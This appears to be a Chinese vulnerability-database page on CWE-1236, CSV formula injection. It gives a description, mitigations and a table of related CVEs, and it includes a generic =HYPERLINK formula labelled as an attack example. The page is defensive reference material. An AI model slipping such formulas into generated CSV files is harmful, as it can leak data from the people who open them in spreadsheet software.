目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CWE-1236 类漏洞列表 132

CWE-1236 类弱点 132 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-1236 属于 CSV 注入漏洞,指程序将用户输入写入 CSV 文件时未对特殊字符进行适当转义。攻击者利用此缺陷,在数据中嵌入以等号、加号或制表符开头的恶意公式,当受害者使用电子表格软件打开文件时,这些公式会被自动执行,可能导致数据泄露、远程代码执行或系统配置篡改。开发者应通过转义特殊字符、限制输入内容或采用非公式格式存储数据来防御此类攻击。

MITRE CWE 官方描述
CWE:CWE-1236 CSV 文件中公式元素的不当中和 英文:产品将用户提供的信息保存到逗号分隔值(Comma-Separated Value, CSV)文件中,但未对特殊元素进行中和,或中和不当,导致当文件被电子表格产品打开时,这些元素可能被解释为命令。
常见影响 (1)
ConfidentialityRead Application Data, Execute Unauthorized Code or Commands
Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.
缓解措施 (3)
ImplementationWhen generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
Effectiveness: Moderate
ImplementationIf a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.
Effectiveness: Moderate
Architecture and DesignCertain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
Effectiveness: Limited
代码示例 (1)
Hyperlinks or other commands can be executed when a cell begins with the formula identifier, '='
=HYPERLINK(link_location, [friendly_name])
Attack · Other
HYPERLINK(link_location, [friendly_name])
Good · Other
CVE ID标题CVSS风险等级Published
CVE-2025-8767 WordPress plugin AnWP Football Leagues 安全漏洞 — AnWP Football Leagues 4.8 Medium2025-08-12
CVE-2025-8808 tianti 安全漏洞 — tianti 天梯 4.3 Medium2025-08-10
CVE-2025-54752 Alfasado PowerCMS 安全漏洞 — PowerCMS 6.5 Medium2025-07-31
CVE-2025-6838 WordPress plugin Broken Link Notifier 安全漏洞 — Broken Link Notifier 4.1 Medium2025-07-11
CVE-2025-7061 Intelbras InControl 安全漏洞 — InControl 2.7 Low2025-07-04
CVE-2025-1421 Inedo ProGet 安全漏洞 — Proget 6.5AIMediumAI2025-05-21
CVE-2025-4546 MaxKB 安全漏洞 — MaxKB 4.7 Medium2025-05-11
CVE-2024-55532 Apache Ranger 安全漏洞 — Apache Ranger 9.8 -2025-03-03
CVE-2025-1836 Incorta 安全漏洞 — Incorta 4.3 Medium2025-03-02
CVE-2024-45084 IBM Cognos Controller 代码问题漏洞 — Cognos Controller 8.0 High2025-02-19
CVE-2024-47572 Fortinet FortiSOAR 安全漏洞 — FortiSOAR 8.3 Critical2025-01-14
CVE-2024-22063 ZTE ZENIC ONE R58 安全漏洞 — ZENIC ONE R58 7.6 High2024-12-30
CVE-2024-9102 phpLDAPadmin 安全漏洞 — phpLDAPadmin 8.8 -2024-12-19
CVE-2024-53260 Autolab 安全漏洞 — Autolab 6.8 Medium2024-11-27
CVE-2021-38963 IBM Aspera Console 安全漏洞 — Aspera Console 8.0 High2024-09-24
CVE-2024-3232 Tenable Identity Exposure 安全漏洞 — Tenable Identity Exposure 7.6 High2024-07-16
CVE-2024-27785 Fortinet FortiAIOps 安全漏洞 — FortiAIOps 5.1 Medium2024-07-09
CVE-2023-5527 WordPress plugin Business Directory 安全漏洞 — Business Directory Plugin – Easy Listing Directories for WordPress 7.4 High2024-06-18
CVE-2023-5424 WordPress plugin WS Form LITE 安全漏洞 — WS Form LITE – Drag & Drop Contact Form Builder 4.7 Medium2024-06-07
CVE-2024-28764 IBM WebSphere Automation 安全漏洞 — WebSphere Automation 6.5 Medium2024-05-01
CVE-2023-48709 iTop 安全漏洞 — iTop 8.0 High2024-04-15
CVE-2024-3214 WordPress Plugin Relevanssi 安全漏洞 — Relevanssi Premium 5.8 Medium2024-04-09
CVE-2024-25007 Ericsson Network Manager 安全漏洞 — Ericsson Network Manager 7.1 High2024-04-04
CVE-2023-47534 Fortinet FortiClientEMS 安全漏洞 — FortiClientEMS 8.7 Critical2024-03-12
CVE-2024-28111 Thinkst Canarytokens 安全漏洞 — canarytokens 6.5 Medium2024-03-06
CVE-2023-35899 IBM Cloud Pak for Automation 安全漏洞 — Cloud Pak for Automation 7.0 High2024-03-05
CVE-2023-45597 AiLux imx6 安全漏洞 — imx6 bundle 5.9 Medium2024-03-05
CVE-2023-42004 IBM Security Guardium 安全漏洞 — Security Guardium 8.0 High2023-11-28
CVE-2023-41798 WordPress Plugin Directorist 安全漏洞 — Directorist – WordPress Business Directory Plugin with Classified Ads Listings 5.1 Medium2023-11-07
CVE-2022-41616 WordPress Plugin export-users-data-csv 安全漏洞 — Export Users Data CSV 7.6 High2023-11-07

CWE-1236 是常见的弱点类别,本平台收录该类弱点关联的 132 条 CVE 漏洞。